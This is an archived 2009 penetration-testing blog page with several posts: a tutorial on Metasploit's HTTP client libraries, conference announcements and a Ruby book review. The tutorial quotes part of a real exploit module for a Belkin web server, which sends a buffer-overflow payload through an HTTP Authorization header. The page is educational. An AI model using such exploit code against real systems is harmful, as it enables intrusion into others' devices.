I'm happy to announce that carnal0wnage and Attack Research have joined blog forces!
the new home for the blog will be:
http://carnal0wnage.attackresearch.com/
please point your RSS readers to the new location and enjoy
With the new blog is the ability for a few more people to post. If you want to contribute please email c0arblog@attackresearch.com
-CG
Monday, June 8, 2009
carnal0wnage and Attack Research join forces!
Monday, June 1, 2009
Making Life Easier With Metasploit Libraries
I was explaining some of this to a friend and figured I'd just post it...
If you have ever looked at an exploit module in metasploit most, if not all, will be calling additional libraries to actually "do" what the work for the exploit --this is actually what makes MSF so great.
What I mean by that is, there is an exploit library(Msf at a higher leverl and Rex and lower level) to set up and do most of the protocol work for us. So if we were going to use any sort of webserver exploit if we were writing it in perl we'd have to write all the code to do the http connection for us (there may be a library for perl too -- bare with me). But with Metasploit in this case we'd just have to call the http library which has the connect method in it.
http://trac.metasploit.com/browser/framework3/trunk/lib/msf/core/exploit/http.rb
check line 70 for our connect method.
| 70 | # |
|---|---|
| 71 | # Connects to an HTTP server. |
| 72 | # |
| 73 | def connect(opts={}) |
| 74 | nclient = Rex::Proto::Http::Client.new( |
| 75 | rhost, |
| 76 | rport.to_i, |
| 77 | { |
| 78 | 'Msf' => framework, |
| 79 | 'MsfExploit' => self, |
| 80 | }, |
| 81 | ssl, |
| 82 | proxies |
| 83 | ) |
we can also send raw http requests.
| 171 | # |
|---|---|
| 172 | # Connects to the server, creates a request, sends the request, reads the response |
| 173 | # |
| 174 | def send_request_raw(opts={}, timeout = -1) |
| 175 | begin |
| 176 | c = connect(opts) |
| 177 | r = c.request_raw(opts) |
| 178 | c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) |
| 179 | rescue ::RuntimeError => e |
| 180 | print_error("An error occurred sending this request: #{e}") |
| 181 | nil |
| 182 | rescue ::Errno::EPIPE, ::Timeout::Error |
| 183 | nil |
| 184 | end |
| 185 | end |
| 186 |
All the client and server methods are actually in http.rb. its a good read.
so whats the point?
well if we start to take a look at the http exploits we'll see an include to:
include Msf::Exploit::Remote::HttpClient
this brings in all our http client methods like the one above.
then when we want to send our actual request we can do something simple like:
from: http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/http/belkin_bulldog.rb
| 55 | def exploit |
|---|---|
| 56 | c = connect |
| 57 | |
| 58 | dwerd = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call dword [esp+58h]").encode_string |
| 59 | |
| 60 | filler = [target.ret].pack('V') + dwerd + make_nops(28) |
| 61 | |
| 62 | print_status("Trying target #{target.name}...") |
| 63 | |
| 64 | send_request_raw({ |
| 65 | 'uri' => payload.encoded, |
| 66 | 'version' => '1.1', |
| 67 | 'method' => 'GET', |
| 68 | 'headers' => |
| 69 | { |
| 70 | 'Authorization' => "Basic #{Rex::Text.encode_base64(filler)}" |
| 71 | } |
| 72 | }, 5) |
on line 56 we initialize our connection with connect and on lines 64-72 we send our request with our overflow and payload
If we wanted to see all the options available to use in our send_request_raw request we would check out our rex::proto::http::client (REX = Lower level) code at line 105.
http://trac.metasploit.com/browser/framework3/trunk/lib/rex/proto/http/client.rb
more on this later, hopefully this is enough to get you started looking under the hood of the framework.
-CG
Wednesday, May 20, 2009
Carnal0wnage will be a BruCon!
I'm happy to announce that I'll be speaking at Brucon in September (18-19) on Open Source Information Gathering.
This is an update to my set of talks last year. After a year of doing OSINT work I've revised the methodology and it should be a pretty good update to the previous talk. I'm planning on focusing a lot on Person/Organization Information Gathering (IG) and should be followed by Chris Nickerson talking about Red and Tiger Team Testing(I call it Full Scope testing) aka putting all the "stuff" we found in my talk to actual use.
should be a good time. plus hoeagaarden on tap!
check the Brucon blog for up to date info
http://blog.brucon.org/
Client-Side Penetration Testing Notacon Edition
Here's the video from the Notacon talk. Audio sucks, sorry...blame the video guy.
Full Scope Security Attacking Layer 8: Client-Side Penetration Testing Notacon '09 Edition from FullScopeSecurity on Vimeo.
Not Dead, just busy
I'm not dead and I haven't quit blogging, just been tired and busy and working on fairly big change to c0 that I think everyone will enjoy. I was hoping it was going to be ready by now but its not...I do this for free...so you'll just have to wait :-) I'm actually waiting on someone else to do something, and they also do what I'm waiting on for free...vicious cycle...
back to your regularly scheduled ranting and pwning
Tuesday, May 19, 2009
Monday, May 4, 2009
Wicked Cool Ruby Scripts Book Review
Wicked Cool Ruby Scripts Book Review
By Steve Pugh
4 stars
Thanks to No Starch Press for my review copy!
From the Description
Wicked Cool Ruby Scripts provides 58 scripts that offer quick solutions to problems like system administration, manipulating images, and managing a website. After getting your feet wet creating simple scripts to automate tasks like file compression and decompression, you'll learn how to create powerful web crawlers, security scripts, and full-fledged libraries and applications, as well as how to:
* Rename files, disable processes, change permissions, and modify users
* Manipulate strings, encrypt files, and sort efficiently
* Validate web links, check for orphan files, and generate forms
* Mass edit photos, extract image information, and create thumbnails
* Parse CSV files and scrape links, images, and pages from the Web
Ruby is a highly extendable and sometimes confusing language especially when you throw in all the various rubygems out there. Wicked Cool Ruby Scripts provides many examples on how to use the various gems to script together quick hacks (wicked scripts) to various problems one may encounter.
Steve walks us through the problem we are trying to solve, the the code to solve the problem, how to run the code, what the results look like, a lengthy discussion on how it works and "hacking the script" with ideas on how to extend what we wrote. All the code is well commented (see the sample chapter on No Starch Press) and well explained.
Pros:
Easy and fun to read, font is readable, doesn't contain pages and pages of uncommented code, source code is available, companion website exists, and the book left me with memorable ways to remember and use the material. I've actually gone back a few times to look at some of the scripts in the book. I also liked the metasploit section (of course). It certainly isn't your typical "Hello World" programming book which is also refreshing.
Cons:
As one other person posted in their Amazon review, its a bit hard to say what level the book is for. Its certainly NOT for beginners as we're expected to already have ruby up and running and understand the basics and its not advanced material either. That leaves us with intermediate which is ok but certainly makes it hard to recommend for knowledgeable programmers. The book is short, its got 58 or so scripts coming in at 170 pages but it would have been nice to have more. Its certainly not "too short" but more would have been nice. I would have liked to had more information on the specific rubygems used for different scripts. Links to where to the specific gem homepages to get further usage would have been nice as well.
View the detailed Table of Contents (PDF)
View the Index (PDF)
Sample Chapter: Chapter 1: "General Purpose Utilities"
Source Code: Source Code from the Book
Subscribe to:
Posts (Atom)
